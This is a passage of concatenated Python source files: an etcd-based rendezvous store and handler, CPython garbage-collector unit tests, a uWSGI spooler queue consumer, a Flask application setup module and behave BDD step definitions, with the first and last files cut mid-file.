kvs = self._try_wait_get(b64_keys, override_timeout)
if kvs is None:
raise LookupError("Timeout while waiting for keys in EtcdStore")
# No return value on success
def check(self, keys) -> bool:
"""
Check if all of the keys are immediately present (without waiting).
"""
b64_keys = [self.prefix + self._encode(key) for key in keys]
kvs = self._try_wait_get(
b64_keys,
override_timeout=datetime.timedelta(microseconds=1), # as if no wait
)
return kvs is not None
def set_timeout(self, timeout: datetime.timedelta):
"""
Change the timeout used for all future operations.
"""
self.timeout = timeout
#
# Encode key/value data in base64, so we can store arbitrary binary data
# in EtcdStore. Input can be `str` or `bytes`.
# In case of `str`, utf-8 encoding is assumed.
#
def _encode(self, value) -> str:
if type(value) == bytes:
return b64encode(value).decode()
elif type(value) == str:
return b64encode(value.encode()).decode()
raise ValueError("Value must be of type str or bytes")
#
# Decode a base64 string (of type `str` or `bytes`).
# Return type is `bytes`, which is more convenient with the Store interface.
#
def _decode(self, value) -> bytes:
if type(value) == bytes:
return b64decode(value)
elif type(value) == str:
return b64decode(value.encode())
raise ValueError("Value must be of type str or bytes")
#
# Get all of the (base64-encoded) etcd keys at once, or wait until all the keys
# are published or timeout occurs.
# This is a helper method for the public interface methods.
#
# On success, a dictionary of {etcd key -> etcd value} is returned.
# On timeout, None is returned.
#
def _try_wait_get(self, b64_keys, override_timeout=None):
timeout = self.timeout if override_timeout is None else override_timeout
deadline = time.time() + timeout.total_seconds()
while True:
# Read whole directory (of keys), filter only the ones waited for
all_nodes = self.client.get(key=self.prefix)
req_nodes = {
node.key: node.value
for node in all_nodes.children
if node.key in b64_keys
}
if len(req_nodes) == len(b64_keys):
# All keys are available
return req_nodes
watch_timeout = deadline - time.time()
if watch_timeout <= 0:
return None
try:
self.client.watch(
key=self.prefix,
recursive=True,
timeout=watch_timeout,
index=all_nodes.etcd_index + 1,
)
except etcd.EtcdWatchTimedOut:
if time.time() >= deadline:
return None
else:
continue
except etcd.EtcdEventIndexCleared:
continue
def _get_socket_with_port():
import socket
addrs = socket.getaddrinfo(
host="localhost", port=None, family=socket.AF_UNSPEC, type=socket.SOCK_STREAM
)
for addr in addrs:
family, type, proto, _, _ = addr
try:
s = socket.socket(family, type, proto)
s.bind(("localhost", 0))
s.listen(0)
return s
except OSError as e:
s.close()
log.info("Socket creation attempt failed: " + e)
raise RuntimeError("Failed to create a socket")
# Helper for _etcd_rendezvous_handler(url)
def _parse_etcd_client_params(params):
kwargs = {}
if "protocol" in params:
protocol = params["protocol"]
assert protocol in ["http", "https"], "Protocol must be http or https."
kwargs["protocol"] = protocol
if "cacert" in params:
kwargs["ca_cert"] = params["cacert"]
if "cert" in params:
if "key" in params:
# python-etcd client expects key as a second element of `cert` tuple
kwargs["cert"] = (params["cert"], params["key"])
else:
kwargs["cert"] = params["cert"]
return kwargs
# Handler for torch.distributed "static" registration
def _custom_rendezvous_handler(url):
"""
Example URLs:
etcd://localhost:2379/123?min_workers=4&max_workers=8&timeout=300
etcd://192.168.0.42/123?etcd_prefix=/custom_prefix/foo&min_workers=4
etcd://localhost:2379/123?min_workers=4&protocol=https&cacert=/etc/kubernetes/certs/ca.crt&cert=/etc/kubernetes/certs/client.crt&key=/etc/kubernetes/certs/client.key
Where:
123 - the run_id (unique id for this training job instance),
min_workers=4 - min number of workers expected to join the rendezvous,
max_workers=8 - max number of workers allowed to join the rendezvous,
defaults to min_workers is not specified.
timeout=300 - total timeout within which next_rendezvous is expected to
succeed; a RendezvousTimeoutException is raised otherwise;
Defaults is 600 (10 minutes).
last_call_timeout - additional wait amount ("last call") after
min number of workers has been reached.
Defaults to 30 seconds.
etcd_prefix - path prefix (from etcd root), inside which all
etcd nodes will be created.
Default is "/torchelastic/p2p".
protocol=https - http (default) or https to access etcd.
cacert=/etc/kubernetes/certs/ca.crt - CA cert to access etcd,
only makes sense with https.
cert=/etc/kubernetes/certs/client.crt - client cert to access etcd,
only makes sense with https.
key=/etc/kubernetes/certs/client.key - client key to access etcd,
only makes sense with https.
"""
import re
from urllib.parse import urlparse
url = urlparse(url)
assert url.scheme == "custom"
# Etcd endpoints. (Current url format only allows a single host)
endpoint = url.netloc
match = re.match(r"(.+):(\d+)$", endpoint) # check if port was provided
if match:
etcd_endpoints = ((match.group(1), int(match.group(2))),)
else:
# Use default etcd port
etcd_endpoints = ((endpoint, 2379),)
# Run ID value -> unique identifier of this training job instance:
# typically a job_id or name assigned by the scheduler or user
run_id = url.path.strip("/")
# Parse all of query parameters:
params = dict(pair.split("=") for pair in filter(None, url.query.split("&")))
etcd_prefix = params.get("etcd_prefix", "/torchelastic/p2p")
num_min_workers = int(params["min_workers"])
num_max_workers = int(params.get("max_workers", num_min_workers))
assert num_min_workers >= 1, "Min number of workers should be at least 1"
assert (
num_max_workers >= num_min_workers
), "Max number of workers cannot be less than min number of workers"
timeout = int(params.get("timeout", CONST_DEFAULT_OVERALL_TIMEOUT))
last_call_timeout = int(
params.get("last_call_timeout", CONST_DEFAULT_LAST_CALL_TIMEOUT)
)
kwargs = _parse_etcd_client_params(params)
# Etcd rendezvous implementation
etcd_rdzv = CustomRendezvous(
endpoints=etcd_endpoints,
prefix=etcd_prefix,
run_id=run_id,
num_min_workers=num_min_workers,
num_max_workers=num_max_workers,
timeout=timeout,
last_call_timeout=last_call_timeout,
**kwargs,
)
return CustomRendezvousHandler(rdzv_impl=etcd_rdzv)
# torchelastic.rendezvous.RendezvousHandler using etcd (API v2):
register_rendezvous_handler("custom", _custom_rendezvous_handler)
|
test_gc.py
|
# expected: fail
import unittest
from test.test_support import verbose, run_unittest
import sys
import time
import gc
import weakref
try:
import threading
except ImportError:
threading = None
### Support code
###############################################################################
# Bug 1055820 has several tests of longstanding bugs involving weakrefs and
# cyclic gc.
# An instance of C1055820 has a self-loop, so becomes cyclic trash when
# unreachable.
class C1055820(object):
def __init__(self, i):
self.i = i
self.loop = self
class GC_Detector(object):
# Create an instance I. Then gc hasn't happened again so long as
# I.gc_happened is false.
def __init__(self):
self.gc_happened = False
def it_happened(ignored):
self.gc_happened = True
# Create a piece of cyclic trash that triggers it_happened when
# gc collects it.
self.wr = weakref.ref(C1055820(666), it_happened)
### Tests
###############################################################################
class GCTests(unittest.TestCase):
def test_list(self):
l = []
l.append(l)
gc.collect()
del l
self.assertEqual(gc.collect(), 1)
def test_dict(self):
d = {}
d[1] = d
gc.collect()
del d
self.assertEqual(gc.collect(), 1)
def test_tuple(self):
# since tuples are immutable we close the loop with a list
l = []
t = (l,)
l.append(t)
gc.collect()
del t
del l
self.assertEqual(gc.collect(), 2)
def test_class(self):
class A:
pass
A.a = A
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_newstyleclass(self):
class A(object):
pass
gc.collect()
del A
self.assertNotEqual(gc.collect(), 0)
def test_instance(self):
class A:
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
def test_newinstance(self):
class A(object):
pass
a = A()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
class B(list):
pass
class C(B, A):
pass
a = C()
a.a = a
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
del B, C
self.assertNotEqual(gc.collect(), 0)
A.a = A()
del A
self.assertNotEqual(gc.collect(), 0)
self.assertEqual(gc.collect(), 0)
def test_method(self):
# Tricky: self.__init__ is a bound method, it references the instance.
class A:
def __init__(self):
self.init = self.__init__
a = A()
gc.collect()
del a
self.assertNotEqual(gc.collect(), 0)
def test_finalizer(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
class A:
def __del__(self): pass
class B:
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_finalizer_newclass(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
class A(object):
def __del__(self): pass
class B(object):
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_function(self):
# Tricky: f -> d -> f, code should call d.clear() after the exec to
# break the cycle.
d = {}
exec("def f(): pass\n") in d
gc.collect()
del d
self.assertEqual(gc.collect(), 2)
def test_frame(self):
def f():
frame = sys._getframe()
gc.collect()
f()
self.assertEqual(gc.collect(), 1)
def test_saveall(self):
# Verify that cyclic garbage like lists show up in gc.garbage if the
# SAVEALL option is enabled.
# First make sure we don't save away other stuff that just happens to
# be waiting for collection.
gc.collect()
# if this fails, someone else created immortal trash
self.assertEqual(gc.garbage, [])
L = []
L.append(L)
id_L = id(L)
debug = gc.get_debug()
gc.set_debug(debug | gc.DEBUG_SAVEALL)
del L
gc.collect()
gc.set_debug(debug)
self.assertEqual(len(gc.garbage), 1)
obj = gc.garbage.pop()
self.assertEqual(id(obj), id_L)
def test_del(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A:
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
def test_del_newclass(self):
# __del__ methods can trigger collection, make this to happen
thresholds = gc.get_threshold()
gc.enable()
gc.set_threshold(1)
class A(object):
def __del__(self):
dir(self)
a = A()
del a
gc.disable()
gc.set_threshold(*thresholds)
# The following two tests are fragile:
# They precisely count the number of allocations,
# which is highly implementation-dependent.
# For example:
# - disposed tuples are not freed, but reused
# - the call to assertEqual somehow avoids building its args tuple
def test_get_count(self):
# Avoid future allocation of method object
assertEqual = self._baseAssertEqual
gc.collect()
assertEqual(gc.get_count(), (0, 0, 0))
a = dict()
# since gc.collect(), we created two objects:
# the dict, and the tuple returned by get_count()
assertEqual(gc.get_count(), (2, 0, 0))
def test_collect_generations(self):
# Avoid future allocation of method object
assertEqual = self.assertEqual
gc.collect()
a = dict()
gc.collect(0)
assertEqual(gc.get_count(), (0, 1, 0))
gc.collect(1)
assertEqual(gc.get_count(), (0, 0, 1))
gc.collect(2)
assertEqual(gc.get_count(), (0, 0, 0))
def test_trashcan(self):
class Ouch:
n = 0
def __del__(self):
Ouch.n = Ouch.n + 1
if Ouch.n % 17 == 0:
gc.collect()
# "trashcan" is a hack to prevent stack overflow when deallocating
# very deeply nested tuples etc. It works in part by abusing the
# type pointer and refcount fields, and that can yield horrible
# problems when gc tries to traverse the structures.
# If this test fails (as it does in 2.0, 2.1 and 2.2), it will
# most likely die via segfault.
# Note: In 2.3 the possibility for compiling without cyclic gc was
# removed, and that in turn allows the trashcan mechanism to work
# via much simpler means (e.g., it never abuses the type pointer or
# refcount fields anymore). Since it's much less likely to cause a
# problem now, the various constants in this expensive (we force a lot
# of full collections) test are cut back from the 2.2 version.
gc.enable()
N = 150
for count in range(2):
t = []
for i in range(N):
t = [t, Ouch()]
u = []
for i in range(N):
u = [u, Ouch()]
v = {}
for i in range(N):
v = {1: v, 2: Ouch()}
gc.disable()
@unittest.skipUnless(threading, "test meaningless on builds without threads")
def test_trashcan_threads(self):
# Issue #13992: trashcan mechanism should be thread-safe
NESTING = 60
N_THREADS = 2
def sleeper_gen():
"""A generator that releases the GIL when closed or dealloc'ed."""
try:
yield
finally:
time.sleep(0.000001)
class C(list):
# Appending to a list is atomic, which avoids the use of a lock.
inits = []
dels = []
def __init__(self, alist):
self[:] = alist
C.inits.append(None)
def __del__(self):
# This __del__ is called by subtype_dealloc().
C.dels.append(None)
# `g` will release the GIL when garbage-collected. This
# helps assert subtype_dealloc's behaviour when threads
# switch in the middle of it.
g = sleeper_gen()
next(g)
# Now that __del__ is finished, subtype_dealloc will proceed
# to call list_dealloc, which also uses the trashcan mechanism.
def make_nested():
"""Create a sufficiently nested container object so that the
trashcan mechanism is invoked when deallocating it."""
x = C([])
for i in range(NESTING):
x = [C([x])]
del x
def run_thread():
"""Exercise make_nested() in a loop."""
while not exit:
make_nested()
old_checkinterval = sys.getcheckinterval()
sys.setcheckinterval(3)
try:
exit = False
threads = []
for i in range(N_THREADS):
t = threading.Thread(target=run_thread)
threads.append(t)
for t in threads:
t.start()
time.sleep(1.0)
exit = True
for t in threads:
t.join()
finally:
sys.setcheckinterval(old_checkinterval)
gc.collect()
self.assertEqual(len(C.inits), len(C.dels))
def test_boom(self):
class Boom:
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom()
b = Boom()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# a<->b are in a trash cycle now. Collection will invoke
# Boom.__getattr__ (to see whether a and b have __del__ methods), and
# __getattr__ deletes the internal "attr" attributes as a side effect.
# That causes the trash cycle to get reclaimed via refcounts falling to
# 0, thus mutating the trash graph as a side effect of merely asking
# whether __del__ exists. This used to (before 2.3b1) crash Python.
# Now __getattr__ isn't called.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2(self):
class Boom2:
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2()
b = Boom2()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
# Much like test_boom(), except that __getattr__ doesn't break the
# cycle until the second time gc checks for __del__. As of 2.3b1,
# there isn't a second time, so this simply cleans up the trash cycle.
# We expect a, b, a.__dict__ and b.__dict__ (4 objects) to get
# reclaimed this way.
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom_new(self):
# boom__new and boom2_new are exactly like boom and boom2, except use
# new-style classes.
class Boom_New(object):
def __getattr__(self, someattribute):
del self.attr
raise AttributeError
a = Boom_New()
b = Boom_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_boom2_new(self):
class Boom2_New(object):
def __init__(self):
self.x = 0
def __getattr__(self, someattribute):
self.x += 1
if self.x > 1:
del self.attr
raise AttributeError
a = Boom2_New()
b = Boom2_New()
a.attr = b
b.attr = a
gc.collect()
garbagelen = len(gc.garbage)
del a, b
self.assertEqual(gc.collect(), 4)
self.assertEqual(len(gc.garbage), garbagelen)
def test_get_referents(self):
alist = [1, 3, 5]
got = gc.get_referents(alist)
got.sort()
self.assertEqual(got, alist)
atuple = tuple(alist)
got = gc.get_referents(atuple)
got.sort()
self.assertEqual(got, alist)
adict = {1: 3, 5: 7}
expected = [1, 3, 5, 7]
got = gc.get_referents(adict)
got.sort()
self.assertEqual(got, expected)
got = gc.get_referents([1, 2], {3: 4}, (0, 0, 0))
got.sort()
self.assertEqual(got, [0, 0] + range(5))
self.assertEqual(gc.get_referents(1, 'a', 4j), [])
def test_is_tracked(self):
# Atomic built-in types are not tracked, user-defined objects and
# mutable containers are.
# NOTE: types with special optimizations (e.g. tuple) have tests
# in their own test files instead.
self.assertFalse(gc.is_tracked(None))
self.assertFalse(gc.is_tracked(1))
self.assertFalse(gc.is_tracked(1.0))
self.assertFalse(gc.is_tracked(1.0 + 5.0j))
self.assertFalse(gc.is_tracked(True))
self.assertFalse(gc.is_tracked(False))
self.assertFalse(gc.is_tracked("a"))
self.assertFalse(gc.is_tracked(u"a"))
self.assertFalse(gc.is_tracked(bytearray("a")))
self.assertFalse(gc.is_tracked(type))
self.assertFalse(gc.is_tracked(int))
self.assertFalse(gc.is_tracked(object))
self.assertFalse(gc.is_tracked(object()))
class OldStyle:
pass
class NewStyle(object):
pass
self.assertTrue(gc.is_tracked(gc))
self.assertTrue(gc.is_tracked(OldStyle))
self.assertTrue(gc.is_tracked(OldStyle()))
self.assertTrue(gc.is_tracked(NewStyle))
self.assertTrue(gc.is_tracked(NewStyle()))
self.assertTrue(gc.is_tracked([]))
self.assertTrue(gc.is_tracked(set()))
def test_bug1055820b(self):
# Corresponds to temp2b.py in the bug report.
ouch = []
def callback(ignored):
ouch[:] = [wr() for wr in WRs]
Cs = [C1055820(i) for i in range(2)]
WRs = [weakref.ref(c, callback) for c in Cs]
c = None
gc.collect()
self.assertEqual(len(ouch), 0)
# Make the two instances trash, and collect again. The bug was that
# the callback materialized a strong reference to an instance, but gc
# cleared the instance's dict anyway.
Cs = None
gc.collect()
self.assertEqual(len(ouch), 2) # else the callbacks didn't run
for x in ouch:
# If the callback resurrected one of these guys, the instance
# would be damaged, with an empty __dict__.
self.assertEqual(x, None)
class GCTogglingTests(unittest.TestCase):
def setUp(self):
gc.enable()
def tearDown(self):
gc.disable()
def test_bug1055820c(self):
# Corresponds to temp2c.py in the bug report. This is pretty
# elaborate.
c0 = C1055820(0)
# Move c0 into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_c0_alive = c0
del c0.loop # now only c1 keeps c0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
ouch = []
def callback(ignored):
ouch[:] = [c2wr()]
# The callback gets associated with a wr on an object in generation 2.
c0wr = weakref.ref(c0, callback)
c0 = c1 = c2 = None
# What we've set up: c0, c1, and c2 are all trash now. c0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's a
# global weakref to c2 (c2wr), but that weakref has no callback.
# There's also a global weakref to c0 (c0wr), and that does have a
# callback, and that callback references c2 via c2wr().
#
# c0 has a wr with callback, which references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see c0 at all, and c0 is
# the only object that has a weakref with a callback. gc clears c1
# and c2. Clearing c1 has the side effect of dropping the refcount on
# c0 to 0, so c0 goes away (despite that it's in an older generation)
# and c0's wr callback triggers. That in turn materializes a reference
# to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
junk = []
i = 0
detector = GC_Detector()
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else the callback wasn't invoked
for x in ouch:
# If the callback resurrected c2, the instance would be damaged,
# with an empty __dict__.
self.assertEqual(x, None)
def test_bug1055820d(self):
# Corresponds to temp2d.py in the bug report. This is very much like
# test_bug1055820c, but uses a __del__ method instead of a weakref
# callback to sneak in a resurrection of cyclic trash.
ouch = []
class D(C1055820):
def __del__(self):
ouch[:] = [c2wr()]
d0 = D(0)
# Move all the above into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_d0_alive = d0
del d0.loop # now only c1 keeps d0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
d0 = c1 = c2 = None
# What we've set up: d0, c1, and c2 are all trash now. d0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's
# a global weakref to c2 (c2wr), but that weakref has no callback.
# There are no other weakrefs.
#
# d0 has a __del__ method that references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see d0 at all. gc clears
# c1 and c2. Clearing c1 has the side effect of dropping the refcount
# on d0 to 0, so d0 goes away (despite that it's in an older
# generation) and d0's __del__ triggers. That in turn materializes
# a reference to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
detector = GC_Detector()
junk = []
i = 0
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else __del__ wasn't invoked
for x in ouch:
# If __del__ resurrected c2, the instance would be damaged, with an
# empty __dict__.
self.assertEqual(x, None)
def test_main():
enabled = gc.isenabled()
gc.disable()
assert not gc.isenabled()
debug = gc.get_debug()
gc.set_debug(debug & ~gc.DEBUG_LEAK) # this test is supposed to leak
try:
gc.collect() # Delete 2nd generation garbage
run_unittest(GCTests, GCTogglingTests)
finally:
gc.set_debug(debug)
# test gc.enable() even if GC is disabled by default
if verbose:
print "restoring automatic collection"
# make sure to always test gc.enable()
gc.enable()
assert gc.isenabled()
if not enabled:
gc.disable()
if __name__ == "__main__":
test_main()
|
tasksconsumer.py
|
from uwsgidecorators import *
import Queue
from threading import Thread
queues = {}
class queueconsumer(object):
def __init__(self, name, num=1, **kwargs):
self.name = name
self.num = num
self.queue = Queue.Queue()
self.threads = []
self.func = None
queues[self.name] = self
@staticmethod
def consumer(self):
while True:
req = self.queue.get()
print req
self.func(req)
self.queue.task_done()
def __call__(self, f):
self.func = f
for i in range(self.num):
t = Thread(target=self.consumer,args=(self,))
self.threads.append(t)
t.daemon = True
t.start()
@spool
def spooler_enqueuer(arguments):
if 'queue' in arguments:
queue = arguments['queue']
queues[queue].queue.put(arguments)
else:
raise Exception("You have to specify a queue name")
def enqueue(*args, **kwargs):
return spooler_enqueuer.spool(*args, **kwargs)
|
core.py
|
import os
import threading
import yaml
from flask import Flask
from flask_debugtoolbar import DebugToolbarExtension
from flask_login import LoginManager
from flask_cors import CORS
from jinja2 import FileSystemLoader
from lxml import etree
from portality import settings, constants
from portality.bll import exceptions
from portality.error_handler import setup_error_logging
from portality.lib import es_data_mapping
import esprit
login_manager = LoginManager()
@login_manager.user_loader
def load_account_for_login_manager(userid):
from portality import models
out = models.Account.pull(userid)
return out
def create_app():
app = Flask(__name__)
configure_app(app)
setup_error_logging(app)
setup_jinja(app)
app.config["LOAD_CROSSREF_THREAD"] = threading.Thread(target=load_crossref_schema, args=(app, ), daemon=True)
app.config["LOAD_CROSSREF_THREAD"].start()
login_manager.init_app(app)
CORS(app)
initialise_apm(app)
DebugToolbarExtension(app)
proxyfix(app)
build_statics(app)
return app
def configure_app(app):
"""
Configure the DOAJ from:
a) the settings.py file
b) the <env>.cfg file
c) the local secrets config in app.cfg
Later imports have precedence, so e.g. app.cfg will override the same setting in production.cfg and settings.py.
"""
# import for settings.py
app.config.from_object(settings)
# import from <env>.cfg
here = os.path.dirname(os.path.abspath(__file__))
app.config['DOAJENV'] = get_app_env(app)
config_path = os.path.join(os.path.dirname(here), app.config['DOAJENV'] + '.cfg')
print('Running in ' + app.config['DOAJENV']) # the app.logger is not set up yet (?)
if os.path.exists(config_path):
app.config.from_pyfile(config_path)
print('Loaded environment config from ' + config_path)
# import from app.cfg
config_path = os.path.join(os.path.dirname(here), 'app.cfg')
if os.path.exists(config_path):
app.config.from_pyfile(config_path)
print('Loaded secrets config from ' + config_path)
def get_app_env(app):
if not app.config.get('VALID_ENVIRONMENTS'):
raise Exception('VALID_ENVIRONMENTS must be set in the config. There shouldn\'t be a reason to change it in different set ups, or not have it.')
env = os.getenv('DOAJENV')
if not env:
envpath = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../.env')
if os.path.exists(envpath):
with open(envpath, 'r') as f:
env = f.readline().strip()
if not env or env not in app.config['VALID_ENVIRONMENTS']:
raise Exception(
"""
Set the DOAJENV environment variable when running the app, guessing is futile and fraught with peril.
DOAJENV=test python portality/app.py
to run the app will do.
Or use the supervisord options - put this in the config: environment= DOAJENV="test" .
Finally, you can create a file called .env with the text e.g. 'dev' in the root of the repo.
Recommended only for dev environments so you don't have to bother specifying it each time you run a script or test.
Valid values are: {valid_doajenv_vals}
You can put environment-specific secret settings in <environment>.cfg , e.g. dev.cfg .
The environment specified in the DOAJENV environment variable will override that specified in the
application configuration (settings.py or app.cfg).
""".format(valid_doajenv_vals=', '.join(app.config['VALID_ENVIRONMENTS']))
)
return env
def load_crossref_schema(app):
schema_path = app.config["SCHEMAS"].get("crossref")
if not app.config.get("CROSSREF_SCHEMA"):
try:
schema_doc = etree.parse(schema_path)
schema = etree.XMLSchema(schema_doc)
app.config["CROSSREF_SCHEMA"] = schema
except Exception as e:
raise exceptions.IngestException(
message="There was an error attempting to load schema from " + schema_path, inner=e)
def create_es_connection(app):
# temporary logging config for debugging index-per-type
#import logging
#esprit.raw.configure_logging(logging.DEBUG)
# make a connection to the index
if app.config['ELASTIC_SEARCH_INDEX_PER_TYPE']:
conn = esprit.raw.Connection(host=app.config['ELASTIC_SEARCH_HOST'], index='')
else:
conn = esprit.raw.Connection(app.config['ELASTIC_SEARCH_HOST'], app.config['ELASTIC_SEARCH_DB'])
return conn
def mutate_mapping(conn, type, mapping):
""" When we are using an index-per-type connection change the mappings to be keyed 'doc' rather than the type """
if conn.index_per_type:
try:
mapping[esprit.raw.INDEX_PER_TYPE_SUBSTITUTE] = mapping.pop(type)
except KeyError:
# Allow this mapping through unaltered if it isn't keyed by type
pass
# Add the index prefix to the mapping as we create the type
type = app.config['ELASTIC_SEARCH_DB_PREFIX'] + type
return type
def put_mappings(conn, mappings):
# get the ES version that we're working with
es_version = app.config.get("ELASTIC_SEARCH_VERSION", "1.7.5")
# for each mapping (a class may supply multiple), create a mapping, or mapping and index
for key, mapping in iter(mappings.items()):
altered_key = mutate_mapping(conn, key, mapping)
ix = conn.index or altered_key
if not esprit.raw.type_exists(conn, altered_key, es_version=es_version):
r = esprit.raw.put_mapping(conn, altered_key, mapping, es_version=es_version)
print("Creating ES Type + Mapping in index {0} for {1}; status: {2}".format(ix, key, r.status_code))
else:
print("ES Type + Mapping already exists in index {0} for {1}".format(ix, key))
def initialise_index(app, conn):
if not app.config['INITIALISE_INDEX']:
app.logger.warn('INITIALISE_INDEX config var is not True, initialise_index command cannot run')
return
if app.config.get("READ_ONLY_MODE", False) and app.config.get("SCRIPTS_READ_ONLY_MODE", False):
app.logger.warn("System is in READ-ONLY mode, initialise_index command cannot run")
return
# get the app mappings
mappings = es_data_mapping.get_mappings(app)
# Send the mappings to ES
put_mappings(conn, mappings)
def initialise_apm(app):
if app.config.get('ENABLE_APM', False):
from elasticapm.contrib.flask import ElasticAPM
app.logger.info("Configuring Elastic APM")
apm = ElasticAPM(app, logging=True)
def proxyfix(app):
if app.config.get('PROXIED', False):
from werkzeug.middleware.proxy_fix import ProxyFix
app.wsgi_app = ProxyFix(app.wsgi_app, x_proto=1, x_host=1)
def setup_jinja(app):
'''Add jinja extensions and other init-time config as needed.'''
app.jinja_env.add_extension('jinja2.ext.do')
app.jinja_env.add_extension('jinja2.ext.loopcontrols')
app.jinja_env.globals['getattr'] = getattr
app.jinja_env.globals['type'] = type
app.jinja_env.globals['constants'] = constants
_load_data(app)
app.jinja_env.loader = FileSystemLoader([app.config['BASE_FILE_PATH'] + '/templates',
os.path.dirname(app.config['BASE_FILE_PATH']) + '/cms/fragments'])
# a jinja filter that prints to the Flask log
def jinja_debug(text):
print(text)
return ''
app.jinja_env.filters['debug']=jinja_debug
def _load_data(app):
if not "data" in app.jinja_env.globals:
app.jinja_env.globals["data"] = {}
datadir = os.path.join(app.config["BASE_FILE_PATH"], "..", "cms", "data")
for datafile in os.listdir(datadir):
with open(os.path.join(datadir, datafile)) as f:
data = yaml.load(f, Loader=yaml.FullLoader)
dataname = datafile.split(".")[0]
dataname = dataname.replace("-", "_")
app.jinja_env.globals["data"][dataname] = data
def build_statics(app):
if not app.config.get("DEBUG", False):
return
from portality.cms import build_fragments, build_sass
here = os.path.dirname(os.path.abspath(__file__))
base_path = os.path.dirname(here)
print("Compiling static content")
build_fragments.build(base_path)
print("Compiling SASS")
build_sass.build(base_path)
app = create_app()
es_connection = create_es_connection(app)
|
deal.py
|
# pylint: disable=missing-docstring, no-name-in-module, invalid-name
from os import getcwd, chdir
from threading import Thread
from behave import given, when, then
from nose.tools import assert_true, assert_equal, assert_is_none, assert_is_not_none
from nose.tools import assert_in, assert_not_in, assert_greater
from bddbot.dealer import Dealer, STATE_PATH
from bddbot.server import BankServer
from bddbot.config import BotConfiguration
from bddbot.errors import BotError
@given("{count:Count} scenario/s were dealt")
def n_scenarios_were_dealt(context, count):
if not context.dealer:
config = BotConfiguration()
context.dealer = Dealer(config.banks, config.tests)
for _ in xrange(count):
context.dealer.deal()
context.dealt += 1
@when("the dealer is loaded")
def load_dealer(context):
assert_is_none(context.dealer)
config = BotConfiguration()
context.dealer = Dealer(config.banks, config.tests)
try:
context.dealer.load()
except BotError as error:
context.error = error
@when("the dealer is loaded on {side:Side}")
def load_dealer_on_side(context, side):
assert_not_in(side, context.bot_config)
assert_not_in(side, context.dealer)
# Change to side's sandbox.
original_directory = getcwd()
chdir(context.sandbox[side].path)
config = BotConfiguration()
dealer = Dealer(config.banks, config.tests, name = side)
context.bot_config[side] = config
context.dealer[side] = dealer
try:
context.dealer[side].load()
except BotError as error:
context.error = error
# Return to original working directory.
chdir(original_directory)
@when("the server is started")
def server_is_started(context):
assert_is_none(context.server)
assert_is_none(context.server_thread)
assert_in("server", context.bot_config)
assert_is_not_none(context.bot_config["server"].host)
assert_is_not_none(context.bot_config["server"].port)
# Change to side's sandbox.
original_directory = getcwd()
chdir(context.sandbox["server"].path)
context.server = BankServer(
context.bot_config["server"].host,
context.bot_config["server"].port,
context.bot_config["server"].banks)
context.server_thread = Thread(target = context.server.serve_forever)
context.server_thread.start()
# Return to original working directory.
chdir(original_directory)
@when("the bot is restarted")
